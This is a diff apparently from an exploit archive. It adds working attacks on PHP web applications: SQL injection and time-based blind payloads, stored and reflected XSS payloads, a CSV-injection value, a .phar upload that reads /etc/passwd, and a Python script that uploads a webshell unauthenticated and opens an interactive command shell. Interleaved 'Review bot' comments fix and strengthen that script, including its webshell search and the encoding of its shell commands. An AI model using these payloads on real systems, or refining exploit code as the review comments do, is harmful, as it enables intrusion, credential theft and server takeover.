+[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
+
+
+[#] Notes:
+- The vulnerability requires a non-admin privilege (normal) user to be exploited.
\ No newline at end of file
diff --git a/exploits/php/webapps/51454.txt b/exploits/php/webapps/51454.txt
new file mode 100644
index 000000000..24ad691b7
--- /dev/null
+++ b/exploits/php/webapps/51454.txt
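Review bot: `$response = curl_exec($ch);` stores the result of the first request and then never reads it, so the variable is dead and nothing distinguishes a transport failure (`curl_exec` returns `false`) from a reply; either drop the assignment or check it. `curl_setopt($ch, CURLOPT_URL, $url)` is redundant after `curl_init($url)`. The `'Content-Type: multipart/form-data;` entry in `$headers` is broken across two source lines, which puts a literal newline inside the header value — whether libcurl folds or rejects that is version-dependent, so it belongs on one line. The script also never says that `PHPSESSID=rose1337` is an arbitrary value rather than something obtained from the target; a one-line comment would prevent readers from treating it as meaningful.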
@@ -0,0 +1,184 @@
+#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
+#Application: PodcastGenerator
+#Version: v3.2.9
+#Bugs: Stored Xss
+#Technology: PHP
+#Vendor URL: https://podcastgenerator.net/
+#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
+#Date of found: 14-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+#########XSS -1##############
+
+1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
+2.set title section as <img src=1 onerror=alert("XSS-1")>
+3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)
+
+payload: <img src=1 onerror=alert("XSS-1")>
+
+poc- request:
+
+POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
+Host: localhost
+Content-Length: 8307
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
+Content-Type: image/jpeg
+
+image content asdfasdfasdfasdfasdfasdfasdfa
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="title"
+
+<img src=1 onerror=alert("XSS-1")>
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="shortdesc"
+
+fffff
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="date"
+
+2023-05-14
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="time"
+
+11:05
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="episodecover"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="longdesc"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="episodenum"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="seasonnum"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="itunesKeywords"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="explicit"
+
+yes
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="authorname"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="authoremail"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="customtags"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="token"
+
+6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
+------WebKitFormBoundary3NXAbhxohxCgUFNi--
+
+
+
+
+
+
+#########XSS -2##############
+1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
+2. set Freebox content as <script>alert("XSS-2")</script>
+3.go to home page (http://localhost/PodcastGenerator/)
+
+payload: <script>alert("XSS-2")</script>
+
+poc Request:
+
+POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
+Host: localhost
+Content-Length: 96
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
+
+#########XSS -3##############
+
+1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
+2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
+3.go to home page (http://localhost/PodcastGenerator/)
+
+payload: <svg/onload=prompt("XSS-3")>
+
+poc-request:
+
+POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
+Host: localhost
+Content-Length: 300
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd©right=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
\ No newline at end of file
diff --git a/exploits/php/webapps/51462.py b/exploits/php/webapps/51462.py
new file mode 100755
index 000000000..5bedcff56
--- /dev/null
+++ b/exploits/php/webapps/51462.py
@@ -0,0 +1,148 @@ +# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution +# Google Dork: NA +# Date: 15/5/2023 +# Exploit Author: Mesut Cetin +# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip +# Version: 1.0 +# Tested on: Kali Linux + +import sys +import requests +import subprocess +import time + +if len(sys.argv) < 2: + print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0]) + print("Example: %s 192.168.106.130" % sys.argv[0]) + sys.exit(1) + +ip = sys.argv[1] +url = f"http://{ip}/kruxton/ajax.php?action=save_settings" + +def brute_force_timestamp(timestamp_prev, ip): + progress = 0 + webshell = None + + for i in range(20): + for j in range(0, 1000, 20): + timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i + url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php" + + response = requests.get(url) + if response.status_code == 200: + webshell = url + break + + progress += 1 + print(f"Attempt {progress}/400", end="\r") + time.sleep(0.1) + + if progress >= 400: + break + + if webshell or progress >= 400: + break + + if webshell: + print("\033[92m[+] Webshell found:", webshell, "\033[0m") + else: + print("\033[91m[-] Webshell not found\033[0m") + + return webshell + +def get_unix_timestamp(): + timestamp = subprocess.check_output(['date', '+%s']).decode().strip() + return int(timestamp) + +def extract_output(response_text): + start_tag = "<pre>" + end_tag = "</pre>" + start_index = response_text.find(start_tag) + end_index = response_text.find(end_tag) + + if start_index != -1 and end_index != -1 and start_index < end_index: + output = response_text[start_index + len(start_tag):end_index] + return output.strip() + + return None + +def code_execution(webshell): + if not webshell: + print("\033[91mWebshell URI not provided\033[0m") + return + + while True: + command = 
input("Enter command to execute (or 'exit' to quit): ") + if command == 'exit': + break + + url = webshell + f"?cmd={command}" + response = requests.get(url) + + output = extract_output(response.text) + if output: + print("\033[93m[+] Output:\033[0m") + print(output) + else: + print("\033[91m[-] No output received\033[0m") + +data = '''\ +-----------------------------49858899034227071432271107689 +Content-Disposition: form-data; name="name" + +test +-----------------------------49858899034227071432271107689 +Content-Disposition: form-data; name="email" + +test@gmail.com +-----------------------------49858899034227071432271107689 +Content-Disposition: form-data; name="contact" + +9000000000 +-----------------------------49858899034227071432271107689 +Content-Disposition: form-data; name="about" + +test +-----------------------------49858899034227071432271107689 +Content-Disposition: form-data; name="img"; filename="shell.php" +Content-Type: application/x-php + +<html> +<body> +<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> +<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> +<input type="SUBMIT" value="Execute"> +</form> +<pre> +<?php + if(isset($_GET['cmd'])) + { + system($_GET['cmd']); + } +?> +</pre> +</body> +</html> + +-----------------------------49858899034227071432271107689--''' + +headers = { + 'Host': f"{ip}", + 'X-Requested-With': 'XMLHttpRequest', + 'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689', + 'Content-Length': str(len(data)), + 'Connection': 'close' +} + +timestamp_prev = get_unix_timestamp() +response = requests.post(url, data=data, headers=headers) + +if response.status_code == 200 and response.text == '1': + print("[+] Timestamp: %s" % timestamp_prev) + print("\033[92m[+] Successly uploaded shell! Unauthenticated! 
\033[0m") + webshell = brute_force_timestamp(timestamp_prev, ip) + code_execution(webshell) + +else: + print("Did not worked") \ No newline at end of file diff --git a/exploits/php/webapps/51463.txt b/exploits/php/webapps/51463.txt new file mode 100644 index 000000000..78cf0e55c --- /dev/null +++ b/exploits/php/webapps/51463.txt @@ -0,0 +1,20 @@ +Exploit Title: Prestashop 8.0.4 - CSV injection +Application: prestashop +Version: 8.0.4 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://prestashop.com/ +Software Link: https://prestashop.com/prestashop-edition-basic/ +Date of found: 14.05.2023 +Author: Mirabbas Ağalarov +Tested on: Windows + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to My Account then information ( http://localhost/index.php?controller=identity ) +step 3. Set Email as =calc|a!z|@test.com +step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI) + +payload: =calc|a!z|@test.com \ No newline at end of file diff --git a/exploits/php/webapps/51464.txt b/exploits/php/webapps/51464.txt new file mode 100644 index 000000000..c075a8587 --- /dev/null +++ b/exploits/php/webapps/51464.txt 
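Review bot: Only 400 of the 1000 candidate names are ever requested in `brute_force_timestamp`: the `progress >= 400` cap ends the search after the outer loop reaches `i == 7`, so every `timestamp_prev - (timestamp_prev % 1000) + j + i` with `i` in 8..19 is skipped, and the window is keyed to the attacker's clock rounded down to a 1000 s boundary rather than to the upload time, so a server whose clock sits just past such a boundary is never found. The script's own assumption (the stored name is `<unix_seconds>_shell.php`; the server side is not in this diff) makes an outward walk from the upload timestamp both smaller and complete, and a bare `200` is a weak oracle on a host with a catch-all page, so the probe should also look for the shell's own markup. Separately, `code_execution` builds `webshell + f"?cmd={command}"` with no encoding, so any command containing `&`, `#` or `+` is mangled by the server's query parser; `requests.get(webshell, params={"cmd": command}, timeout=10)` fixes that. `get_unix_timestamp` shells out to `date` although `time` is already imported; `int(time.time())` is portable and drops the subprocess.
```python
def brute_force_timestamp(timestamp_prev, ip, window=120):
    # The upload handler is assumed to store the file as <unix_seconds>_shell.php,
    # so probe outward from the upload time instead of a clock-rounded 1000 s block.
    for offset in range(-window, window):
        candidate = f"http://{ip}/kruxton/assets/uploads/{timestamp_prev + offset}_shell.php"
        response = requests.get(candidate, timeout=10)
        # A catch-all 200 page would otherwise count as a hit; require the shell's <pre>.
        if response.status_code == 200 and "<pre>" in response.text:
            print("\033[92m[+] Webshell found:", candidate, "\033[0m")
            return candidate
    print("\033[91m[-] Webshell not found\033[0m")
    return None
```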
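Review bot: The impact claimed in step 3 depends on the administrator's spreadsheet client, not on PrestaShop: `=calc|a!z|@test.com` is a DDE-style formula that runs only if the export is opened in Excel with DDE enabled and the user accepts its prompts, and LibreOffice or Excel with DDE disabled show a cell value instead. The advisory should state that precondition and the client used, since `Tested on: Windows` does not say. The server-side defects worth naming are that the customer email field accepts a value starting with `=` and that the customer CSV export writes it unescaped; the usual fix is to prefix cells beginning with `=`, `+`, `-`, `@`, tab or CR with a `'` at export time. The admin URL in step 3 embeds an installation-specific `_token` value that should be shown as a placeholder.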
@@ -0,0 +1,63 @@ +#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE) +#Application: SitemagicCMS +#Version: 4.4.3 +#Bugs: RCE +#Technology: PHP +#Vendor URL: https://sitemagic.org/Download.html +#Software Link: https://github.com/Jemt/SitemagicCMS +#Date of found: 14-05-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + +2. Technical Details & POC +======================================== +steps: +1. go to content then files +2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?> +3. go to http://localhost/SitemagicCMS/files/images/shell.phar + + + +payload: <?php echo system("cat /etc/passwd"); ?> + + + +Poc request : + +POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1 +Host: localhost +Content-Length: 492 +Cache-Control: max-age=0 +sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: iframe +Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf +Connection: close + +------WebKitFormBoundarywPUsZSbtgJ6nAn8W +Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar" +Content-Type: application/octet-stream + +<?php echo system('cat 
/etc/passwd'); ?> + +------WebKitFormBoundarywPUsZSbtgJ6nAn8W +Content-Disposition: form-data; name="SMPostBackControl" + + +------WebKitFormBoundarywPUsZSbtgJ6nAn8W +Content-Disposition: form-data; name="SMRequestToken" + +60a7a113cf94842a197912273825b421 +------WebKitFormBoundarywPUsZSbtgJ6nAn8W-- \ No newline at end of file diff --git a/exploits/php/webapps/51465.txt b/exploits/php/webapps/51465.txt new file mode 100644 index 000000000..b898117bd --- /dev/null +++ b/exploits/php/webapps/51465.txt 
@@ -0,0 +1,45 @@ +# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) +# Date: 15 May 2023 +# Exploit Author: Astik Rawat (ahrixia) +# Vendor Homepage: https://qloapps.com/ +# Software Link: https://github.com/webkul/hotelcommerce +# Version: 1.5.2 +# Tested on: Kali Linux 2022.4 +# CVE : CVE-2023-30256 + + +Description: + +A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence. + +Steps to exploit: +1) Go to Signin page on the system. +2) There are two parameters which can be exploited via XSS + - back + - email_create + +2.1) Insert your payload in the "back"- GET and POST Request + Proof of concept (Poc): + The following payload will allow you to execute XSS - + + Payload (Plain text): + xss onfocus=alert(1) autofocus= xss + + Payload (URL Encoded): + xss%20onfocus%3dalert(1)%20autofocus%3d%20xss + + Full GET Request (back): + [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d] + +2.2) Insert your payload in the "email_create" - POST Request Only + Proof of concept (Poc): + The following payload will allow you to execute XSS - + + Payload (Plain text): + xss><img src=a onerror=alert(document.cookie)>xss + + Payload (URL Encoded): + xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss + + POST Request (email_create) (POST REQUEST DATA ONLY): + [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d] \ No newline at end of file diff --git a/exploits/php/webapps/51468.txt b/exploits/php/webapps/51468.txt new file mode 100644 index 000000000..f326dcb08 --- /dev/null +++ b/exploits/php/webapps/51468.txt 
@@ -0,0 +1,28 @@
+[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
+[#] Exploit Date: May 16, 2023.
+[#] CVSS 3.1: 6.4 (Medium)
+[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+[#] Tactic: Initial Access (TA0001)
+[#] Technique: Exploit Public-Facing Application (T1190)
+[#] Application Name: Affiliate Me
+[#] Application Version: 5.0.1
+[#] Vendor: https://www.powerstonegh.com/
+
+
+[#] Author: h4ck3r - Faisal Albuloushi
+[#] Contact: SQL@hotmail.co.uk
+[#] Blog: https://www.0wl.tech
+
+
+[#] Exploit:
+
+[path]/admin.php?show=reply&id=[Injected Query]
+
+
+[#] 3xample:
+
+[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
+
+
+[#] Notes:
+- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/51471.txt
new file mode 100644
index 000000000..91f318e86
--- /dev/null
+++ b/exploits/php/webapps/51471.txt
@@ -0,0 +1,45 @@ +# Exploit Title: LeadPro CRM v1.0 - SQL Injection +# Date: 2023-05-17 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578 +# Demo Site: https://demo.leadifly.in +# Tested on: Kali Linux +# CVE: N/A + + +### Request ### + +GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 +HTTP/1.1 +Host: localhost +Cookie: +XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; +leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V +Authorization: Bearer +eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8 +X-Xsrf-Token: 
+eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0= +Referer: https://localhost/admin/product +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close + + +### Parameter & Payloads ### + +Parameter: filters (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name +lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND +(8549=8549&order=id desc&offset=0&limit=10 \ No newline at end of file diff --git a/exploits/php/webapps/51472.txt b/exploits/php/webapps/51472.txt new file mode 100644 index 000000000..dc04ec3b2 --- /dev/null +++ b/exploits/php/webapps/51472.txt 
@@ -0,0 +1,43 @@
+# Exploit Title: Smart School v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/smart-school-school-management-system/19426018
+# Demo Site: https://demo.smart-school.in
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /course/filterRecords/ HTTP/1.1
+Host: localhost
+Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 136
+Origin: https://localhost
+Referer: https://localhost/course/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1
+
+
+### Parameter & Payloads ###
+
+Parameter: searchdata[0][searchfield] (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload:
+searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id
+AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--
+hAHp&searchdata[0][searchvalue]=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51473.txt
new file mode 100644
index 000000000..0c64b543c
--- /dev/null
+++ b/exploits/php/webapps/51473.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
+# Demo Site: https://demo.stackposts.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /spmo/auth/login HTTP/1.1
+X-Requested-With: XMLHttpRequest
+Referer: https://localhost/spmo/
+Content-Type: application/x-www-form-urlencoded
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Length: 104
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*
+
+
+### Parameter & Payloads ###
+
+Parameter: username (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
+AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
\ No newline at end of file
diff --git a/exploits/php/webapps/51474.txt
new file mode 100644
index 000000000..a64b1bbda
--- /dev/null
+++ b/exploits/php/webapps/51474.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Quicklancer v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
+# Demo Site: https://quicklancer.bylancer.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /php/user-ajax.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+x-requested-with: XMLHttpRequest
+Referer: https://localhost
+Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;
+quickjob_view_counted=31; Quick_lang=arabic
+Content-Length: 93
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+action=searchStateCountry&dataString=deneme
+
+
+### Parameter & Payloads ###
+
+Parameter: dataString (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
+FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo
\ No newline at end of file
diff --git a/exploits/php/webapps/51475.py
new file mode 100755
index 000000000..9f88973b8
--- /dev/null
+++ b/exploits/php/webapps/51475.py
